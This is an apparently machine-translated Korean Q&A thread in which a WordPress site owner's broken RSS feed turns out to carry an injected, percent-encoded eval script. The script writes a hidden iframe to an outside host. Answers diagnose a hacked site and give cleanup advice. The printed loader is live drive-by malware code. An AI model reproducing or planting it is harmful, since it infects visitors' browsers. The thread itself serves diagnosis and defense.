2010-02-05 5 views
0

피드가 손상되었습니다. Feed Validator는이 부분이 문제라고 말합니다. 이견있는 사람?RSS가 업데이트되지 않습니다.

]]>content:encoded> 

wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/wfw:commentRss> 

slash:comments>2/slash:comments> 

/item> 

/channel> 

/rss> 

script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script> 
+0

괜찮습니다. 모든 오프닝'<'가 없습니다. 또한 eval() 문은 매우 의심스러워 보이는 외부 주소로 연결됩니다 (오프라인 상태 임에도 불구하고). 이게 당신의 코드인가요? –

+0

여기에 표시되지 않기 때문에 <을 (를) 제거했습니다. – Daniel

답변

4
<script language="javascript">eval(unescape("%64%6F%63... 

님의 해킹했습니다. 공격자가 사이트를 손상시키고이 스크립트를 일부 페이지 하단에 추가했습니다 (아마 모든 사이트가 기본 사이트에 의해 판단됩니다). 다른 사람의 컴퓨터를 감염시키려는 웹 브라우저와 플러그인에 대해 악의적 인 코드를로드합니다. RSS가 유효하지 않게된다는 결과는 부작용입니다.

더 많은 사람들을 감염시키기 전에 사이트를 오프라인으로 만들어야하고, 손상된 방법/어떤 종류의 서버인지에 따라 정리 작업을해야합니다. 물론 최소한 현재의 사이트 코드를 삭제하고 깨끗한 (*) 컴퓨터에서 새 암호를 새로 작성하여 모든 암호를 변경해야합니다. 자신의 [가상] 서버 인 경우 서버 자체가 루팅되지 않았는지 확인해야합니다.

(* : 사이트가 해킹당하는 가장 일반적인 방법은 FTP를 실행하는 해킹 된 클라이언트 컴퓨터를 통과하는 것입니다.이 트로이 목마는 연결할 때 FTP 암호를 도용하므로 이전에 사용했던 모든 컴퓨터를 검사하고 소독해야합니다 그 중 한 곳에서 의심스러운 것을 발견하면 AV 툴을 완전히 청소하는 것을 신뢰하지 마십시오. 왜냐하면 오늘날에는 악성 코드의 양을 따라 잡을 수 없기 때문입니다. 운영 체제를 다시 설치하십시오. 대신에.

+0

좋은 소리가 아닙니다. 나는 wordpress와 godaddy를 사용한다. 재판이 만료 된 후 몇 달 전에 FTP 사용을 중단했습니다. 나는 이것에 관해서 무엇을해야하는지 전혀 모른다. 나는 너를 도와 나를 고용하고 싶어한다. 관심이 있으십니까? – Daniel

+0

수행 할 작업에 대한 몇 가지 지침 : http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html –

+0

@ 대니얼 : 여기에서 먼저 해결하겠습니다. FTP로 중지 한 후 어떻게 사이트를 업데이트하기 위해 연결 했습니까? (예 : SFTP? FTP와 동일한 암호를 사용했거나 암호가 강합니까? 또는 간단한 단어와 같은 암호입니까?) 클라이언트 컴퓨터와 사이트를 업데이트하는 데 사용 된 다른 바이러스 검사기를 실행 해보십시오. '

관련 문제